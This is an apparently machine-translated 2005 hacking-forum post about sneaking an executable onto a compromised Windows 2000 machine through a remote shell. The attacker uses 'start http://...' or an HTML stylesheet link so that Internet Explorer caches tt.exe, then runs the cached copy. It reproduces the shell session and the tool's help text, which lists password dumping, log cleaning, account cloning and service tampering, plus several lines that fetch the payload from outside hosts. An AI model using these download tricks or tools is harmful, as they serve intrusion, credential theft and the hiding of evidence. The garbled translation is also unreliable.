Metamorphosis file transfer method(tftp, ftp, iget. vbe are cool)-vulnerability warning-the black bar safety net

2005-10-20T00:00:00
ID MYHACK58:6220053844
Type myhack58
Reporter 佚名
Modified 2005-10-20T00:00:00

Description

The system user does not log in the case of testing, of course, landing the better, huh?

-----------------Cute dividing line---------------------------

| "Wollf Remote Manager" v1. 6 Code by wollf, http://www.xfocus.org

[wsdd-wb7egq0ebt at C:\WINNT\system32]#dos

Microsoft Windows 2 0 0 0 [Version 5 dot 00.2195] (C) copyright 1985-1998 Microsoft Corp.

C:\WINNT\system32>dir c:\tt. exe /s dir c:\tt. exe /s The C drive of the volume is not tags. Volume serial number is 045A-2E61 File Not Found

C:\WINNT\system32>start http://aaa.sssss.com/a.htm start http://aaa.sssss.com/a.htm

C:\WINNT\system32>dir c:\tt. exe /s dir c:\tt. exe /s


The C drive of the volume is not tags. Volume serial number is 045A-2E61 c:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\ Content. IE5\0VELAZCD directory


2005-10-09 1 8:1 5 39,139 tt[1]. exe 1 File 39,139 bytes

Lists all the files: 1 File 39,139 bytes 0 directory 3,273,519,104 available bytes

C:\WINNT\system32>"c:\Documents and Settings\Default User\Local Settings\Temporary

Internet Files\Content. IE5\0VELAZCD\tt[1]. exe"

"c:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\ Content. IE5\0VELAZCD\tt[1]. exe" MZ at Opintion : -filter ---Change TCP/IP filter to on/off status of the dot -addport ---Add ports to the filter’ allowed portlist. -setport ---Set ports as the filter’ allowed portlist. -nicinfo ---List TCP/IP interface info. -pslist ---List active processes. -pskill ---Kill a specified process. -dlllist ---List dlls of a specified process. -sysinfo ---List system info. -shutdown ---Shutdown system. -reboot ---Reboot the system. -poweroff ---Turn off power. -logoff ---Logoff current user's session. Used in an interactive logon session only. -chkts ---Check Terminal Service info. -setupts ---Install Terminal Service. -remts ---Remove Terminal Service. -chgtsp ---Reset Terminal Service port. -clog ---Clean system log. -enumsrv ---List all services. -common ---List detail info of a specified service. -instsrv ---Install a service. -cfgsrv ---Changes the configuration of a service. -remsrv ---Remove a specified service. -startsrv ---Start a specified service. -stopsrv ---Stop a specified service. -netget ---Download from http/ftp. -redirect ---Port redirect. -chkuser ---List all account, sid and anti clone. -clone ---Clone from admin to dest. -never ---Set account looks like never logged on. -killuser ---Del account. Even "guest" account. -su ---Run process as Local_System privilege. Usage: mt.exe -su [File]---- Default run cmd. e xe -findpass ---Show all logged on user's pass. -netstat ---List TCP connections. -killtcp ---Kill TCP connection. -psport ---Map ports to processes. -touch ---Set the file times for a specified file. -secdel ---Secure delete files and directory or zap free s pace. -regshell ---Enter a console registry editor. -chkdll ---Detect gina dll virus.

C:\WINNT\system32>

-----------------Cute dividing line---------------------------

Oh, the purpose to achieve the

Let everyone look at the htm code

-----------------Cute dividing line---------------------------

<head>

<LINK href="http://abcd.abcd.cd/tt.exe" rel=stylesheet type=text/css>

</head>

-----------------Cute dividing line---------------------------

That's it, if you don't understand what that had to say sorry. Oh

Disadvantages? Of course there is some pull, huh?

------------------------------------------------------------------

Khan, the original has long been mentioned, there is no need to construct the htm method,

Ashamed to die

START ITS:HTTP://sdf.sdfd.net/tt.exe